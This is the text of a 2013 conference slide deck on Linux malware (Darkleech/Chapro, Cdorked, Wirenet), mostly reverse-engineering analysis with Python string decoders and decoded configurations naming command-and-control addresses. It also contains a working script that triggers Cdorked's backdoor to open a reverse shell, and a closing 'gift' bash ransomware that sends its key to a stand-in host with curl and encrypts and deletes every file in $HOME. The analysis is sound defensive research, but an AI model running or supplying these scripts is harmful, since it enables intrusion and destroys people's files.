malwaremoutane.net/rmll2013/day_1/linux_malware.pdf · linux malware presentation @r00tbsd – paul...

Linux malware presentation

@r00tbsd – Paul Rascagnères from Malware.lu

Malware.lu

July 2013

@r00tbsd – Paul Rascagnères




Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion



Presentation

Who am I? Paul Rascangères - @r00tbsd or @malware.lu. Creator and maintener of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication”



Presentation

Why am I here and why this talk?Some people think that malware don't exist onLinux platform.

4 examples in 2012/2013: - Darkleech (Apache module) - Cdorked (Apache server) - wirenet (Remote Administration Tool) - gift...



Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion



Darkleech/Chapro

First seen The first version was identify in August 2012.

How does it work? This malware is an apache module. The module is executed by LoadModule command and defines in the module configuration file.

Features: - inject JavaScript code to redirect users on infected Website - backdoor



Darkleech/Chapro

Analysis - module Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so Example: mod_sec2_config.so Module execution: cat /etc/apache2/modules/[VARIOUS].conf LoadModule sec2_config_module modules/mod_sec2_config.so Analysis - Symptoms The malware injects Exploit Kits (JS) on the Web pages:



Darkleech/Chapro

Analysis - Symptoms



Darkleech/Chapro

Analysis – Symptoms The redirection is performed by a JavaScript insertion (IFrame):



Darkleech/Chapro

Analysis – Targets selection The targets selection is performed thanks to the REFERER. C_ARRAY_BAN_USERAGENT:SAFARI YANDEXOPERA CRAWLERFIREFOX JIKECHROME SPIDERGOOGLEBOT ROBOTSLURP PAPERLIBOTYAHOO SNAPPREVIEWBOTBING BUFFERBOTLINUX MEDIAPARTNERSOPENBSD HATENAMACINTOSH BLUEDRAGONMAC OS WORDPRESSIPHONE XIANGUO...



Darkleech/Chapro

Analysis – Reversing The data are encoded in the file:



Darkleech/Chapro

Analysis – Reversing Several function (symbols) are linked to the encoding: - 0x17C8 xor_decrypt_string - 0x17ED xor_encrypt_string - 0x1800 xor_encrypt



Darkleech/Chapro

Analysis – Reversing xor_decrypt_string pseudo-Cxor_decrypt_string(A8, Ac, A10, A14){ L00003117(); ebx = ebx + 0x5001; esp = esp - 0xc; Vfffffff4 = A14 + 1; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp - 0x10) = L00002D90(); if(A14 > 0) { ecx = 0; do { edx = 0; eax = 0; edx = 0 >> 0x1f; Ac = Ac / Ac; al = *A10 & 0xff ^ *(Ac % Ac + A8); *( *(ebp - 0x10)) = al; } while(1 != A14); } esi = *(ebp - 0x10); *(esi + A14) = 0; eax = esi; esp = esp + 0xc;}



Darkleech/Chapro

Analysis – Reversing xor_decrypt_string python implementation:

fd.seek(0x84a0)key = fd.read(23)

for s in tab: fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) clear_text = decrypted.split('\x00')[0] print('%s: %s') % (s['name'], clear_text)



Darkleech/Chapro

Analysis – Reversing$ python sec2.py "./mod_sec2_config.so"C_MODULE_VERSION: "2012.12.14"C_CC_HOST: "217.23.13.6"C_CC_URI: "/Home/index.php"C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"Host: "%s"Content-Type: "application/x-www-form-urlencoded"Content-Length:" %i %s"C_MARKER_LEFT: "{{{"C_MARKER_RIGHT: "}}}"C_TMP_DIR: "/"C_LIST_PREF: "sess_"C_COOKIE_NAME: "PHP_SESSION_ID="C_ARRAY_TAGS_FOR_INJECT: " ＜ /script＞＜ /style＞＜ /head＞＜ /title＞...



Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion



Cdorked

Presentation Unliked it brother Darkleech/Chapro, Cdorked is not an Apache module but a custom apache server. The malware used a XOR to encrypt strings:

fd.seek(0x16B460) # XOR keykey = fd.read(24)

for i, s in enumerate(tab): fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key))) print('xx%s: %s') % (i, decrypted)



Cdorked

How to get a shell ? - request



Cdorked

How to get a shell ? - encryption



Cdorked

How to get a shell ? - encryption

Here is the code:

ip = $client_ip key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5 key[1] = ( (ip AND 0xFF0000 ) >> 16 ) + 33 key[2] = ( (ip AND 0xFF00 ) >> 8 ) + 55 key[3] = ( (ip ) ) + 78



Cdorked

How to get a shell ? - the reverse-shell

import urllib2import subprocessimport os

LHOST = '192.168.56.1'LPORT = '4444'

RHOST = '192.168.56.101'RPORT = '80'

param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)

if os.fork(): req = urllib2.Request(request) req.add_header('X-Real-IP', '251.223.201.178') urllib2.urlopen(req)else: subprocess.call(['nc', '-l', LPORT])



Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion



Wirenet

Strings obfuscation The attacker used RC4 algorithm to encrypt configuration:



Wirenet

Strings obfuscation

fp = open(sys.argv[1]) fp.seek(0xf4d8, 0) key = fp.read(16)for c in crypted: rc4 = ARC4.new(key) fp.seek(c['adr']) data = fp.read(c['len']) val = rc4.decrypt(data).split('\x00')[0] print "%s: %s" % (c['name'], val)

if c['name'] == 'BoolSettingsByte': for name, o in options.iteritems(): print "%s: %s" % (name, isOption(val, o))



Wirenet

Strings obfuscation

y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56eConnectionString: 212.7.208.65:4141;ProxyString: -Password: sm0k4s523syst3m523HostId: LINUXMutexName: vJEewiWDInstallPath: %home%/WIFIADAPTStartupKeyName1: WIFIADAPTERStartupKeyName2: -KeyLoggerFileName: %Home%\.m8d.datBoolSettingsByte: 237run_as_daemon: Truexinit_start: Falseinstall_file: Truelock_file?: Truekeylogger: Truesingle_instance: Truedesktop_start: TrueConnectionType: 001



Wirenet

Fake C&C

wirenet $ New session 127.0.0.1:52956wirenet $ session0 127.0.0.1:52956 LINUX rootbsd @ alienwirenet $ session 0Switch to session 0 context127.0.0.1:52956 $ help

Undocumented commands:======================EOF cred_thunderbird get log_clear mkdir rm shellcp creds help log_get mv screen cred_pidgin exit info ls ps session



Wirenet

Fake C&C

127.0.0.1:52956 $ infoarch: LINUXname: rootbsd @ alienDISTRIB_ID=UbuntuDISTRIB_RELEASE=12.04DISTRIB_CODENAME=preciseDISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"127.0.0.1:52956 $ shellShell is start with /bin/sh (EOF to exit)iduid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)

Shell is stop



Wirenet

Fake C&C

wirenet $ New session 127.0.0.1:52956wirenet $ session0 127.0.0.1:52956 LINUX rootbsd @ alienwirenet $ session 0Switch to session 0 context127.0.0.1:52956 $ help

Undocumented commands:======================EOF cred_thunderbird get log_clear mkdir rm shellcp creds help log_get mv screen cred_pidgin exit info ls ps session



Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion



Gift

Linux is so powerfull... (ransomware for free)

#!/bin/bashpasswd=$(openssl rand -hex 64)curl http://www.c-and-c.com/test?$passwdlist=$(find $HOME -type f)for i in $(echo $list)do openssl aes-256-ecb -in $i -out $i.new -pass pass:$passwd rm $idone



Conclusion

malwaremoutane.net/rmll2013/day_1/linux_malware.pdf · linux malware presentation @r00tbsd – paul...

Documents